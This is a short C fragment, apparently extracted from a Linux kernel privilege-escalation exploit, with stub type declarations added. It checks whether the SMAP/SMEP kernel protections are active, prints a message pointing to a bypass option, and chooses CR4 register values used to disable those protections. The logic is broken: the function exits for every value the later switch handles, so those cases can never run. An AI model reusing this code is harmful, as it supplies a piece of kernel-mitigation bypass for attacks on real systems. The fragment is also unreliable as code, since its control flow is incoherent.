
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int CR4_DESIRED_VALUE ;
 int EXIT_FAILURE ;
 int dprintf (char*) ;
 int exit (int ) ;
 int smap_smep_enabled () ;

void check_smep_smap() {
 int rv = smap_smep_enabled();


 if (rv >= 1) {
  dprintf("[-] SMAP/SMEP detected, use ENABLE_SMEP_SMAP_BYPASS\n");
  exit(EXIT_FAILURE);
 }


 switch(rv) {
 case 1:
  CR4_DESIRED_VALUE = 0x406e0ul;
  break;
 case 2:
  CR4_DESIRED_VALUE = 0x407f0ul;
  break;
 case 3:
  CR4_DESIRED_VALUE = 0x407f0ul;
  break;
 }
}
